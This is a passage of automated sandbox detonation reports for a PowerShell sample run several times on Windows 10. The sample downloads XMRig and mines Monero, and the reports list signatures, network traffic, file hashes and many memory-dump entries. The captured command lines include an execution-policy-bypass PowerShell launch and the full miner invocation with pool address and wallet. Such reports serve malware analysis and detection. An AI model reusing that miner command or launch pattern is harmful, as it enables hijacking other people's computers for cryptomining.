N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4400-3-0x00007FFA016F3000-0x00007FFA016F4000-memory.dmp

memory/4400-5-0x000001F250540000-0x000001F250562000-memory.dmp

memory/4400-8-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

memory/4400-9-0x000001F250750000-0x000001F2507C6000-memory.dmp

memory/4400-10-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5dediglm.tqo.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4400-25-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

memory/4400-61-0x000001F2506E0000-0x000001F2506EA000-memory.dmp

memory/4400-48-0x000001F2506F0000-0x000001F250702000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4684-90-0x000001E4B9080000-0x000001E4B90A0000-memory.dmp

memory/4684-91-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4400-92-0x00007FFA016F3000-0x00007FFA016F4000-memory.dmp

memory/4684-93-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4400-94-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

memory/4400-95-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

memory/4684-96-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-97-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-98-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-99-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-100-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-101-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-102-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-103-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-104-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-105-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-106-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-107-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-108-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-109-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-110-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-111-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-112-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-113-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-114-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-115-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-116-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-117-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-118-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-119-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-120-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-121-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-122-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-123-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-124-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-125-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-126-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-127-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-128-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-129-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-130-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-131-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-132-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-133-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-134-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-135-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-136-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-137-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-138-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-139-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-140-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-141-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-142-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-143-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-144-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-145-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-146-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-147-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-148-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-149-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-150-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-151-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-152-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-153-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-154-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-155-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4684-156-0x00007FF743120000-0x00007FF743D53000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:11

Platform

win10v2004-20240508-en

Max time kernel

1798s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4168,i,13281073920029625837,8253721632651544158,262144 --variations-seed-version --mojo-platform-channel-handle=3984 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4028,i,13281073920029625837,8253721632651544158,262144 --variations-seed-version --mojo-platform-channel-handle=1408 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
BE 2.17.107.105:443 www.bing.com tcp
US 8.8.8.8:53 105.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp

Files

memory/1968-0-0x00007FFE86713000-0x00007FFE86715000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcqmurmi.szu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1968-10-0x00007FFE86710000-0x00007FFE871D1000-memory.dmp

memory/1968-11-0x000001AF5DB80000-0x000001AF5DBA2000-memory.dmp

memory/1968-12-0x00007FFE86710000-0x00007FFE871D1000-memory.dmp

memory/1968-14-0x00007FFE86710000-0x00007FFE871D1000-memory.dmp

memory/1968-15-0x000001AF5DDB0000-0x000001AF5DDC2000-memory.dmp

memory/1968-16-0x000001AF5DB70000-0x000001AF5DB7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3980-47-0x0000025B3CB00000-0x0000025B3CB20000-memory.dmp

memory/3980-48-0x0000025B3CB40000-0x0000025B3CB60000-memory.dmp

memory/3980-49-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/1968-50-0x00007FFE86710000-0x00007FFE871D1000-memory.dmp

memory/1968-51-0x00007FFE86713000-0x00007FFE86715000-memory.dmp

memory/3980-53-0x0000025B3CB60000-0x0000025B3CB80000-memory.dmp

memory/3980-52-0x0000025B3CB80000-0x0000025B3CBA0000-memory.dmp

memory/3980-54-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-55-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/1968-56-0x00007FFE86710000-0x00007FFE871D1000-memory.dmp

memory/3980-57-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-59-0x0000025B3CB60000-0x0000025B3CB80000-memory.dmp

memory/3980-58-0x0000025B3CB80000-0x0000025B3CBA0000-memory.dmp

memory/3980-60-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-61-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-62-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-63-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-64-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-65-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-66-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-67-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-68-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-69-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-70-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-71-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-72-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-73-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-74-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-75-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-76-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-77-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-78-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-79-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-80-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-81-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-82-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-83-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-84-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-85-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-86-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-87-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-88-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-89-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-90-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-91-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-92-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-93-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-94-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-95-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-96-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-97-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-98-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-99-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-100-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-101-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-102-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-103-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-104-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-105-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-106-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-107-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-108-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-109-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-110-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-111-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-112-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-113-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-114-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-115-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-116-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-117-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-118-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:00

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1805s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/4324-2-0x00007FF9D8443000-0x00007FF9D8444000-memory.dmp

memory/4324-5-0x000001F3C7440000-0x000001F3C7462000-memory.dmp

memory/4324-8-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp

memory/4324-9-0x000001F3C75F0000-0x000001F3C7666000-memory.dmp

memory/4324-10-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yzvxlyfi.4ow.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4324-25-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp

memory/4324-48-0x000001F3C7790000-0x000001F3C77A2000-memory.dmp

memory/4324-61-0x000001F3C75E0000-0x000001F3C75EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/528-90-0x0000015DC5600000-0x0000015DC5620000-memory.dmp

memory/4324-91-0x00007FF9D8443000-0x00007FF9D8444000-memory.dmp

memory/4324-92-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp

memory/528-93-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/4324-94-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp

memory/528-95-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-96-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-97-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-98-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-99-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-100-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

